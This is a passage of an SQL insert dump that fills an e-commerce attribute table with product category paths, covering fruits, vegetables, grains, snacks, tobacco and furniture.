(1799, 1799, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Citrus Fruits > Kumquats'),
(1800, 1800, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Citrus Fruits > Lemons'),
(1801, 1801, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Citrus Fruits > Limequats'),
(1802, 1802, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Citrus Fruits > Limes'),
(1803, 1803, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Citrus Fruits > Oranges'),
(1804, 1804, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Citrus Fruits > Tangelos'),
(1805, 1805, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Coconuts'),
(1806, 1806, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Dates'),
(1807, 1807, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Feijoas'),
(1808, 1808, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Figs'),
(1809, 1809, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Fruit Mixes'),
(1810, 1810, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Grapes'),
(1811, 1811, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Guavas'),
(1812, 1812, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Homely Fruits'),
(1813, 1813, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Kiwis'),
(1814, 1814, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Longan'),
(1815, 1815, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Loquats'),
(1816, 1816, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Lychees'),
(1817, 1817, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > MadroÃ±o'),
(1818, 1818, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Mamey'),
(1819, 1819, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Mangosteens'),
(1820, 1820, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Melons'),
(1821, 1821, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Papayas'),
(1822, 1822, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Passion Fruit'),
(1823, 1823, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Pears'),
(1824, 1824, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Persimmons'),
(1825, 1825, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Physalis'),
(1826, 1826, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Pineapples'),
(1827, 1827, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Pitahayas'),
(1828, 1828, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Pomegranates'),
(1829, 1829, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Quince'),
(1830, 1830, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Rambutans'),
(1831, 1831, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Sapodillo'),
(1832, 1832, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Sapote'),
(1833, 1833, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Soursops'),
(1834, 1834, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Starfruits'),
(1835, 1835, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Stone Fruits'),
(1836, 1836, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Stone Fruits > Apricots'),
(1837, 1837, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Stone Fruits > Cherries'),
(1838, 1838, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Stone Fruits > Mangoes'),
(1839, 1839, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Stone Fruits > Peaches & Nectarines'),
(1840, 1840, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Stone Fruits > Plumcots'),
(1841, 1841, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Stone Fruits > Plums'),
(1842, 1842, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Sugar Apples'),
(1843, 1843, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Tamarindo'),
(1844, 1844, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables'),
(1845, 1845, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Arracachas'),
(1846, 1846, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Artichokes'),
(1847, 1847, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Asparagus'),
(1848, 1848, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Beans'),
(1849, 1849, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Beets'),
(1850, 1850, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Borage'),
(1851, 1851, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Broccoli'),
(1852, 1852, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Brussel Sprouts'),
(1853, 1853, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Cabbage'),
(1854, 1854, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Cactus Leaves'),
(1855, 1855, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Cardoon'),
(1856, 1856, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Carrots'),
(1857, 1857, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Cauliflower'),
(1858, 1858, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Celery'),
(1859, 1859, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Celery Roots'),
(1860, 1860, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Corn'),
(1861, 1861, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Cucumbers'),
(1862, 1862, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Eggplants'),
(1863, 1863, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Fennel Bulbs'),
(1864, 1864, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Fiddlehead Ferns'),
(1865, 1865, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Gai Choy'),
(1866, 1866, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Gai Lan'),
(1867, 1867, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Garlic'),
(1868, 1868, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Ginger Root'),
(1869, 1869, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Gobo Root'),
(1870, 1870, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens'),
(1871, 1871, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Arugula'),
(1872, 1872, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Beet Greens'),
(1873, 1873, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Bok Choy'),
(1874, 1874, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Chard'),
(1875, 1875, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Chicory'),
(1876, 1876, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Choy Sum'),
(1877, 1877, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Kale'),
(1878, 1878, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Lettuce'),
(1879, 1879, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > On Choy'),
(1880, 1880, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Salad Mixes'),
(1881, 1881, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Spinach'),
(1882, 1882, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Greens > Yu Choy'),
(1883, 1883, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Horseradish Root'),
(1884, 1884, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Jicama'),
(1885, 1885, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Kohlrabi'),
(1886, 1886, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Leeks'),
(1887, 1887, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Lotus Roots'),
(1888, 1888, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Malangas'),
(1889, 1889, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Mushrooms'),
(1890, 1890, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Okra'),
(1891, 1891, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Onions'),
(1892, 1892, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Parsley Roots'),
(1893, 1893, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Parsnips'),
(1894, 1894, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Peas'),
(1895, 1895, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Peppers'),
(1896, 1896, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Potatoes'),
(1897, 1897, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Radishes'),
(1898, 1898, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Rhubarb'),
(1899, 1899, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Shallots'),
(1900, 1900, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Sprouts'),
(1901, 1901, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Squashes & Gourds'),
(1902, 1902, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Sugar Cane'),
(1903, 1903, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Sunchokes'),
(1904, 1904, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Sweet Potatoes'),
(1905, 1905, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Tamarillos'),
(1906, 1906, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Taro Root'),
(1907, 1907, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Tomatoes'),
(1908, 1908, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Turnips & Rutabagas'),
(1909, 1909, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Vegetable Mixes'),
(1910, 1910, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Water Chestnuts'),
(1911, 1911, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Watercress'),
(1912, 1912, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Wheatgrass');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(1913, 1913, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Yams'),
(1914, 1914, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Vegetables > Yuca Root'),
(1915, 1915, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fruit Sauces'),
(1916, 1916, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal'),
(1917, 1917, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Amaranth'),
(1918, 1918, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Barley'),
(1919, 1919, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Buckwheat'),
(1920, 1920, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Cereal & Granola'),
(1921, 1921, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Couscous'),
(1922, 1922, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Millet'),
(1923, 1923, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Oats, Grits & Hot Cereal'),
(1924, 1924, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Quinoa'),
(1925, 1925, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Rice'),
(1926, 1926, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Rye'),
(1927, 1927, 0, 'Food, Beverages & Tobacco > Food Items > Grains, Rice & Cereal > Wheat'),
(1928, 1928, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs'),
(1929, 1929, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs > Eggs'),
(1930, 1930, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs > Meat'),
(1931, 1931, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs > Meat > Canned Meats'),
(1932, 1932, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs > Meat > Fresh & Frozen Meats'),
(1933, 1933, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs > Meat > Lunch & Deli Meats'),
(1934, 1934, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs > Seafood'),
(1935, 1935, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs > Seafood > Canned Seafood'),
(1936, 1936, 0, 'Food, Beverages & Tobacco > Food Items > Meat, Seafood & Eggs > Seafood > Fresh & Frozen Seafood'),
(1937, 1937, 0, 'Food, Beverages & Tobacco > Food Items > Nuts & Seeds'),
(1938, 1938, 0, 'Food, Beverages & Tobacco > Food Items > Pasta & Noodles'),
(1939, 1939, 0, 'Food, Beverages & Tobacco > Food Items > Prepared Foods'),
(1940, 1940, 0, 'Food, Beverages & Tobacco > Food Items > Prepared Foods > Prepared Appetizers & Side Dishes'),
(1941, 1941, 0, 'Food, Beverages & Tobacco > Food Items > Prepared Foods > Prepared Meals & EntrÃ©es'),
(1942, 1942, 0, 'Food, Beverages & Tobacco > Food Items > Seasonings & Spices'),
(1943, 1943, 0, 'Food, Beverages & Tobacco > Food Items > Seasonings & Spices > Herbs & Spices'),
(1944, 1944, 0, 'Food, Beverages & Tobacco > Food Items > Seasonings & Spices > MSG'),
(1945, 1945, 0, 'Food, Beverages & Tobacco > Food Items > Seasonings & Spices > Pepper'),
(1946, 1946, 0, 'Food, Beverages & Tobacco > Food Items > Seasonings & Spices > Salt'),
(1947, 1947, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods'),
(1948, 1948, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Breadsticks'),
(1949, 1949, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Cereal & Granola Bars'),
(1950, 1950, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Cheese Puffs'),
(1951, 1951, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Chips'),
(1952, 1952, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Crackers'),
(1953, 1953, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Croutons'),
(1954, 1954, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Fruit Snacks'),
(1955, 1955, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Jerky'),
(1956, 1956, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Popcorn'),
(1957, 1957, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Pork Rinds'),
(1958, 1958, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Pretzels'),
(1959, 1959, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Pudding & Gelatin Snacks'),
(1960, 1960, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Puffed Rice Cakes'),
(1961, 1961, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Salad Toppings'),
(1962, 1962, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Sesame Sticks'),
(1963, 1963, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Snack Cakes'),
(1964, 1964, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Sticky Rice Cakes'),
(1965, 1965, 0, 'Food, Beverages & Tobacco > Food Items > Snack Foods > Trail & Snack Mixes'),
(1966, 1966, 0, 'Food, Beverages & Tobacco > Food Items > Soups & Broths'),
(1967, 1967, 0, 'Food, Beverages & Tobacco > Food Items > Tofu, Soy & Vegetarian Products'),
(1968, 1968, 0, 'Food, Beverages & Tobacco > Food Items > Tofu, Soy & Vegetarian Products > Cheese Alternatives'),
(1969, 1969, 0, 'Food, Beverages & Tobacco > Food Items > Tofu, Soy & Vegetarian Products > Meat Alternatives'),
(1970, 1970, 0, 'Food, Beverages & Tobacco > Food Items > Tofu, Soy & Vegetarian Products > Seitan'),
(1971, 1971, 0, 'Food, Beverages & Tobacco > Food Items > Tofu, Soy & Vegetarian Products > Tempeh'),
(1972, 1972, 0, 'Food, Beverages & Tobacco > Food Items > Tofu, Soy & Vegetarian Products > Tofu'),
(1973, 1973, 0, 'Food, Beverages & Tobacco > Tobacco Products'),
(1974, 1974, 0, 'Food, Beverages & Tobacco > Tobacco Products > Chewing Tobacco'),
(1975, 1975, 0, 'Food, Beverages & Tobacco > Tobacco Products > Cigarettes'),
(1976, 1976, 0, 'Food, Beverages & Tobacco > Tobacco Products > Cigars'),
(1977, 1977, 0, 'Food, Beverages & Tobacco > Tobacco Products > Loose Tobacco'),
(1978, 1978, 0, 'Food, Beverages & Tobacco > Tobacco Products > Smoking Pipes'),
(1979, 1979, 0, 'Food, Beverages & Tobacco > Tobacco Products > Vaporizers & Electronic Cigarettes'),
(1980, 1980, 0, 'Furniture'),
(1981, 1981, 0, 'Furniture > Baby & Toddler Furniture'),
(1982, 1982, 0, 'Furniture > Baby & Toddler Furniture > Baby & Toddler Furniture Sets'),
(1983, 1983, 0, 'Furniture > Baby & Toddler Furniture > Bassinet & Cradle Accessories'),
(1984, 1984, 0, 'Furniture > Baby & Toddler Furniture > Bassinets & Cradles'),
(1985, 1985, 0, 'Furniture > Baby & Toddler Furniture > Changing Tables'),
(1986, 1986, 0, 'Furniture > Baby & Toddler Furniture > Crib & Toddler Bed Accessories'),
(1987, 1987, 0, 'Furniture > Baby & Toddler Furniture > Crib & Toddler Bed Accessories > Crib Bumpers & Liners'),
(1988, 1988, 0, 'Furniture > Baby & Toddler Furniture > Crib & Toddler Bed Accessories > Crib Conversion Kits'),
(1989, 1989, 0, 'Furniture > Baby & Toddler Furniture > Cribs & Toddler Beds'),
(1990, 1990, 0, 'Furniture > Baby & Toddler Furniture > High Chair & Booster Seat Accessories'),
(1991, 1991, 0, 'Furniture > Baby & Toddler Furniture > High Chairs & Booster Seats'),
(1992, 1992, 0, 'Furniture > Beds & Accessories'),
(1993, 1993, 0, 'Furniture > Beds & Accessories > Bed & Bed Frame Accessories'),
(1994, 1994, 0, 'Furniture > Beds & Accessories > Beds & Bed Frames'),
(1995, 1995, 0, 'Furniture > Beds & Accessories > Headboards & Footboards'),
(1996, 1996, 0, 'Furniture > Beds & Accessories > Mattress Foundations'),
(1997, 1997, 0, 'Furniture > Beds & Accessories > Mattresses'),
(1998, 1998, 0, 'Furniture > Benches'),
(1999, 1999, 0, 'Furniture > Benches > Kitchen & Dining Benches'),
(2000, 2000, 0, 'Furniture > Benches > Storage & Entryway Benches'),
(2001, 2001, 0, 'Furniture > Benches > Vanity Benches'),
(2002, 2002, 0, 'Furniture > Cabinets & Storage'),
(2003, 2003, 0, 'Furniture > Cabinets & Storage > Armoires & Wardrobes'),
(2004, 2004, 0, 'Furniture > Cabinets & Storage > Buffets & Sideboards'),
(2005, 2005, 0, 'Furniture > Cabinets & Storage > China Cabinets & Hutches'),
(2006, 2006, 0, 'Furniture > Cabinets & Storage > Dressers'),
(2007, 2007, 0, 'Furniture > Cabinets & Storage > File Cabinets'),
(2008, 2008, 0, 'Furniture > Cabinets & Storage > Ironing Centers'),
(2009, 2009, 0, 'Furniture > Cabinets & Storage > Kitchen Cabinets'),
(2010, 2010, 0, 'Furniture > Cabinets & Storage > Magazine Racks'),
(2011, 2011, 0, 'Furniture > Cabinets & Storage > Media Storage Cabinets & Racks'),
(2012, 2012, 0, 'Furniture > Cabinets & Storage > Storage Cabinets & Lockers'),
(2013, 2013, 0, 'Furniture > Cabinets & Storage > Storage Chests'),
(2014, 2014, 0, 'Furniture > Cabinets & Storage > Storage Chests > Hope Chests'),
(2015, 2015, 0, 'Furniture > Cabinets & Storage > Storage Chests > Toy Chests'),
(2016, 2016, 0, 'Furniture > Cabinets & Storage > Vanities'),
(2017, 2017, 0, 'Furniture > Cabinets & Storage > Vanities > Bathroom Vanities'),
(2018, 2018, 0, 'Furniture > Cabinets & Storage > Vanities > Bedroom Vanities'),
(2019, 2019, 0, 'Furniture > Cabinets & Storage > Wine & Liquor Cabinets'),
(2020, 2020, 0, 'Furniture > Cabinets & Storage > Wine Racks'),
(2021, 2021, 0, 'Furniture > Carts & Islands'),
(2022, 2022, 0, 'Furniture > Carts & Islands > Kitchen & Dining Carts'),
(2023, 2023, 0, 'Furniture > Carts & Islands > Kitchen Islands'),
(2024, 2024, 0, 'Furniture > Chair Accessories'),
(2025, 2025, 0, 'Furniture > Chair Accessories > Hanging Chair Replacement Parts'),
(2026, 2026, 0, 'Furniture > Chairs'),
(2027, 2027, 0, 'Furniture > Chairs > Arm Chairs, Recliners & Sleeper Chairs'),
(2028, 2028, 0, 'Furniture > Chairs > Bean Bag Chairs'),
(2029, 2029, 0, 'Furniture > Chairs > Chaises'),
(2030, 2030, 0, 'Furniture > Chairs > Electric Massaging Chairs'),
(2031, 2031, 0, 'Furniture > Chairs > Floor Chairs'),
(2032, 2032, 0, 'Furniture > Chairs > Folding Chairs & Stools'),
(2033, 2033, 0, 'Furniture > Chairs > Gaming Chairs'),
(2034, 2034, 0, 'Furniture > Chairs > Hanging Chairs'),
(2035, 2035, 0, 'Furniture > Chairs > Kitchen & Dining Room Chairs'),
(2036, 2036, 0, 'Furniture > Chairs > Rocking Chairs'),
(2037, 2037, 0, 'Furniture > Chairs > Slipper Chairs'),
(2038, 2038, 0, 'Furniture > Chairs > Table & Bar Stools'),
(2039, 2039, 0, 'Furniture > Entertainment Centers & TV Stands'),
(2040, 2040, 0, 'Furniture > Furniture Sets'),
(2041, 2041, 0, 'Furniture > Furniture Sets > Bathroom Furniture Sets'),
(2042, 2042, 0, 'Furniture > Furniture Sets > Bedroom Furniture Sets'),
(2043, 2043, 0, 'Furniture > Furniture Sets > Kitchen & Dining Furniture Sets'),
(2044, 2044, 0, 'Furniture > Furniture Sets > Living Room Furniture Sets'),
(2045, 2045, 0, 'Furniture > Futon Frames'),
(2046, 2046, 0, 'Furniture > Futon Pads'),
(2047, 2047, 0, 'Furniture > Futons'),
(2048, 2048, 0, 'Furniture > Office Furniture'),
(2049, 2049, 0, 'Furniture > Office Furniture > Desks'),
(2050, 2050, 0, 'Furniture > Office Furniture > Office Chairs'),
(2051, 2051, 0, 'Furniture > Office Furniture > Office Furniture Sets'),
(2052, 2052, 0, 'Furniture > Office Furniture > Workspace Tables'),
(2053, 2053, 0, 'Furniture > Office Furniture > Workspace Tables > Art & Drafting Tables'),
(2054, 2054, 0, 'Furniture > Office Furniture > Workspace Tables > Conference Room Tables'),
(2055, 2055, 0, 'Furniture > Office Furniture > Workstations & Cubicles'),
(2056, 2056, 0, 'Furniture > Office Furniture Accessories'),
(2057, 2057, 0, 'Furniture > Office Furniture Accessories > Desk Parts & Accessories'),
(2058, 2058, 0, 'Furniture > Office Furniture Accessories > Office Chair Accessories'),
(2059, 2059, 0, 'Furniture > Office Furniture Accessories > Workstation & Cubicle Accessories'),
(2060, 2060, 0, 'Furniture > Ottomans'),
(2061, 2061, 0, 'Furniture > Outdoor Furniture'),
(2062, 2062, 0, 'Furniture > Outdoor Furniture > Outdoor Beds'),
(2063, 2063, 0, 'Furniture > Outdoor Furniture > Outdoor Furniture Sets'),
(2064, 2064, 0, 'Furniture > Outdoor Furniture > Outdoor Ottomans'),
(2065, 2065, 0, 'Furniture > Outdoor Furniture > Outdoor Seating'),
(2066, 2066, 0, 'Furniture > Outdoor Furniture > Outdoor Seating > Outdoor Benches'),
(2067, 2067, 0, 'Furniture > Outdoor Furniture > Outdoor Seating > Outdoor Chairs'),
(2068, 2068, 0, 'Furniture > Outdoor Furniture > Outdoor Seating > Outdoor Sectional Sofa Units'),
(2069, 2069, 0, 'Furniture > Outdoor Furniture > Outdoor Seating > Outdoor Sofas'),
(2070, 2070, 0, 'Furniture > Outdoor Furniture > Outdoor Seating > Sunloungers'),
(2071, 2071, 0, 'Furniture > Outdoor Furniture > Outdoor Storage Boxes'),
(2072, 2072, 0, 'Furniture > Outdoor Furniture > Outdoor Tables'),
(2073, 2073, 0, 'Furniture > Outdoor Furniture Accessories'),
(2074, 2074, 0, 'Furniture > Outdoor Furniture Accessories > Outdoor Furniture Covers'),
(2075, 2075, 0, 'Furniture > Room Divider Accessories'),
(2076, 2076, 0, 'Furniture > Room Dividers'),
(2077, 2077, 0, 'Furniture > Shelving'),
(2078, 2078, 0, 'Furniture > Shelving > Bookcases & Standing Shelves'),
